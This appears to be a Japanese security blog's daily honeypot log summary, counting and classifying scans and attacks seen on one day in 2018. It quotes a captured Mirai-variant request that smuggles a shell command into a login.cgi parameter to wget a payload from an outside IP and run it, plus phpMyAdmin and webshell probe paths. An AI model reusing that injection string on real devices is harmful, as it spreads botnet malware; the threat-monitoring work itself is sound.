S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(25日目)

WOWhoneypotの2018/6/28(木)(運用25日目)の簡易分析です。

本日の総アクセス件数はなんと、1520件です。

1210 [2018-06-28 "GET /manager/html
153 [2018-06-28 "POST /command.php
33 [2018-06-28 "GET /
25 [2018-06-28 "HEAD /
2 [2018-06-28 "GET /xampp/phpmyadmin/index.php
2 [2018-06-28 "GET /www/phpMyAdmin/index.php
2 [2018-06-28 "GET /web/phpMyAdmin/index.php
2 [2018-06-28 "GET /typo3/phpmyadmin/index.php
2 [2018-06-28 "GET /tools/phpMyAdmin/index.php
2 [2018-06-28 "GET /pmd/index.php
2 [2018-06-28 "GET /pma-old/index.php
2 [2018-06-28 "GET /pmamy/index.php
2 [2018-06-28 "GET /pmamy2/index.php
2 [2018-06-28 "GET /PMA/index.php
2 [2018-06-28 "GET /pma/index.php
2 [2018-06-28 "GET /PMA2/index.php
2 [2018-06-28 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-28 "GET /phpMyAdminold/index.php
2 [2018-06-28 "GET /phpMyAdmin.old/index.php
2 [2018-06-28 "GET /phpmyadmin-old/index.php
2 [2018-06-28 "GET /phpMyAdmin/index.php
2 [2018-06-28 "GET /phpmyadmin/index.php
2 [2018-06-28 "GET /phpMyadmin_bak/index.php
2 [2018-06-28 "GET /phpmyadmin2/index.php
2 [2018-06-28 "GET /phpmyadmin1/index.php
2 [2018-06-28 "GET /phpmyadmin0/index.php
2 [2018-06-28 "GET /phpma/index.php
2 [2018-06-28 "GET /phpadmin/index.php
2 [2018-06-28 "GET /mysql/index.php
2 [2018-06-28 "GET /mysqladmin/index.php
2 [2018-06-28 "GET /mysql-admin/index.php
2 [2018-06-28 "GET /myadmin/index.php
2 [2018-06-28 "GET /myadmin2/index.php
2 [2018-06-28 "GET /index.php
2 [2018-06-28 "GET hxxp://114.215.207[.]183:83/index.php
2 [2018-06-28 "GET /db/index.php
2 [2018-06-28 "GET /dbadmin/index.php
2 [2018-06-28 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-28 "GET /admin/PMA/index.php
2 [2018-06-28 "GET /admin/pma/index.php
2 [2018-06-28 "GET /admin/phpMyAdmin/index.php
2 [2018-06-28 "GET /admin/phpmyadmin/index.php
2 [2018-06-28 "GET /admin/phpmyadmin2/index.php
2 [2018-06-28 "GET /admin/mysql/index.php
2 [2018-06-28 "GET /admin/mysql2/index.php
2 [2018-06-28 "GET /admin/index.php
1 [2018-06-28 "PROPFIND /
1 [2018-06-28 "POST /xx.php
1 [2018-06-28 "POST /xw.php
1 [2018-06-28 "POST /wuwu11.php
1 [2018-06-28 "POST /w.php
1 [2018-06-28 "POST /s.php
1 [2018-06-28 "POST /sheep.php
1 [2018-06-28 "POST /db_session.init.php
1 [2018-06-28 "POST /db.init.php
1 [2018-06-28 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-28 "GET /webdav/
1 [2018-06-28 "GET /stssys.htm
1 [2018-06-28 "GET /phpmyadmin
1 [2018-06-28 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-28 "GET /cgi/common.cgi

1520件のうち1210件はTomcatの管理ページへのブルートフォース攻撃でした。全て同じIPからです。

これといつものmyPhpAdminを除外すると以下です。

153 [2018-06-28 "POST /command.php
1 [2018-06-28 "GET /cgi/common.cgi
1 [2018-06-28 "GET /stssys.htm

1 [2018-06-28 "POST /xx.php
1 [2018-06-28 "POST /xw.php
1 [2018-06-28 "POST /wuwu11.php
1 [2018-06-28 "POST /w.php
1 [2018-06-28 "POST /s.php
1 [2018-06-28 "POST /sheep.php
1 [2018-06-28 "POST /db_session.init.php
1 [2018-06-28 "POST /db.init.php

1 [2018-06-28 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-28 "GET /webdav/
1 [2018-06-28 "HEAD hxxp://180.163.113[.]82/check_proxy

残っていたログの中で未知のものはありません。

Reaperの感染を狙ったもの。

153 [2018-06-28 "POST /command.php
1 [2018-06-28 "GET /cgi/common.cgi
1 [2018-06-28 "GET /stssys.htm 

 php脆弱性を狙っているもの

1 [2018-06-28 "POST /xx.php
1 [2018-06-28 "POST /xw.php
1 [2018-06-28 "POST /wuwu11.php
1 [2018-06-28 "POST /w.php
1 [2018-06-28 "POST /s.php
1 [2018-06-28 "POST /sheep.php
1 [2018-06-28 "POST /db_session.init.php
1 [2018-06-28 "POST /db.init.php

 Mirai亜種への感染を狙ったもの

1 [2018-06-28 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

WebDAVの調査

1 [2018-06-28 "GET /webdav/

公開Proxyの調査

1 [2018-06-28 "HEAD hxxp://180.163.113[.]82/check_proxy

 

 

本日のハンティングログです。いつものMirai亜種のみです。

1 [2018-06-28 wget hxxp://185.62.190[.]191/r

以上です。